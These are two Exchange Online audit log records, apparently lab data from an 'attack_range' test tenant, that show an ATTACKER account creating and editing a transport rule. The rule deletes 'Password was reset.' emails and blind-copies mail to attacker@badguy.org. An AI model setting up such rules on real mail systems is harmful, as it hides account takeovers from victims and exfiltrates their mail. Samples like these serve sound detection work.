{"AppAccessContext": {"AADSessionId": "76bed86ec-85fa-46ff-8bf4-da6164617ca7", "IssuedAtTime": "2025-01-14T14:35:03", "UniqueTokenId": "fjnbEEQzJkybACRSqMNcAA"}, "CreationTime": "2025-01-14T14:52:48", "Id": "4869dcbf-459b-4a9a-1508-08dd34ab1d21", "Operation": "Set-TransportRule", "OrganizationId": "6915b1e0-b081-4829-8866-f1a3e883a9ae", "RecordType": 1, "ResultStatus": "True", "UserKey": "ATTACKER@attack_range.lan", "UserType": 2, "Version": 1, "Workload": "Exchange", "ClientIP": "20.81.125.41:64068", "ObjectId": "Password Reset Email Drop", "UserId": "ATTACKER@attack_range.lan", "AppId": "497effe9-df71-4043-a8bb-14cf78c4b63b", "AppPoolName": "MSExchangeAdminApiNetCore", "ClientAppId": "", "CorrelationID": "", "DeviceId": "9505adeb-1b2c-472f-946e-c75dbf871d53", "ExternalAccess": false, "OrganizationName": "attack_range.onmicrosoft.com", "OriginatingServer": "SN6PR08MB5488 (15.20.8335.015)", "Parameters": [{"Name": "Priority", "Value": "2"}, {"Name": "Identity", "Value": "d19c5b14-0a96-4736-8fc7-1af8ebf4a418"}, {"Name": "Name", "Value": "Password Reset Email Drop"}, {"Name": "SubjectMatchesPatterns", "Value": "Password was reset."}, {"Name": "DeleteMessage", "Value": "True"}], "RequestId": "7c7c24f8-85c9-798d-0d82-841e022fb79f", "SessionId": "76bed86ec-85fa-46ff-8bf4-da6164617ca7", "TokenObjectId": "084d5007-933b-4977-aed6-3aaf7bb699ab", "TokenTenantId": "6915b1e0-b081-4829-8866-f1a3e883a9ae"}
{"AppAccessContext": {"AADSessionId": "76bed86ec-85fa-46ff-8bf4-da6164617ca7", "IssuedAtTime": "2025-01-14T14:35:03", "UniqueTokenId": "fjnbEEQzJkybACRSqMNcAA"}, "CreationTime": "2025-01-14T14:52:01", "Id": "171b1287-78b4-4f3b-35ac-08dd34ab009b", "Operation": "New-TransportRule", "OrganizationId": "6915b1e0-b081-4829-8866-f1a3e883a9ae", "RecordType": 1, "ResultStatus": "True", "UserKey": "ATTACKER@attack_range.lan", "UserType": 2, "Version": 1, "Workload": "Exchange", "ClientIP": "20.81.125.41:21208", "ObjectId": "", "UserId": "ATTACKER@attack_range.lan", "AppId": "497effe9-df71-4043-a8bb-14cf78c4b63b", "AppPoolName": "MSExchangeAdminApiNetCore", "ClientAppId": "", "CorrelationID": "", "DeviceId": "9505adeb-1b2c-472f-946e-c75dbf871d53", "ExternalAccess": false, "OrganizationName": "attack_range.onmicrosoft.com", "OriginatingServer": "SN6PR08MB5488 (15.20.8335.015)", "Parameters": [{"Name": "SubjectMatchesPatterns", "Value": "Password was reset."}, {"Name": "DeleteMessage", "Value": "True"}, {"Name": "StopRuleProcessing", "Value": "False"}, {"Name": "Priority", "Value": "47"}, {"Name": "SetAuditSeverity", "Value": ""}, {"Name": "Mode", "Value": "Enforce"}, {"Name": "SenderAddressLocation", "Value": "Header"}, {"Name": "Name", "Value": "Password Reset Email Drop"}, {"Name": "Enabled", "Value": "False"}, {"Name": "RuleErrorAction", "Value": "Ignore"}, {"Name": "Comments", "Value": "message copy"}, {"Name": "BlindCopyTo", "Value": "attacker@badguy.org"}], "RequestId": "9c4aeb10-52cc-ad8a-39e2-8fa5b43eb697", "SessionId": "76bed86ec-85fa-46ff-8bf4-da6164617ca7", "TokenObjectId": "084d5007-933b-4977-aed6-3aaf7bb699ab", "TokenTenantId": "6915b1e0-b081-4829-8866-f1a3e883a9ae"}